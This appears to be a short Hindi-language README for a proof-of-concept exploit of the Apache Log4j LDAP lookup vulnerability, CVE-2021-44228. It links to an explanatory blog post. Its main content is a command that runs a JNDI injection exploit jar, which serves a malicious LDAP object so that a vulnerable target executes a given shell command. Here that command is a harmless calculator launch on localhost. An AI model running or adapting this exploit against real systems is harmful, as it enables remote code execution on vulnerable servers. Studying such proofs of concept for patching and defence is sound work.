
apache log4j LDAP लुकअप भेद्यता का प्रूफ ऑफ कॉन्सेप्ट। CVE-2021-44228
Apache Log4j LDAP lookup भेद्यता का प्रूफ ऑफ कॉन्सेप्ट
आप इस भेद्यता के बारे में यहाँ और पढ़ सकते हैं: https://blog.cloudflare.com/inside-the-log4j2-vulnerability-cve-2021-44228/
प्रदान किया गया LDAP सर्वर जो दुर्भावनापूर्ण ऑब्जेक्ट लौटाता है, उसे कैसे चलाएँ ?
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "open /Applications/Calculator.app" -A "127.0.0.1"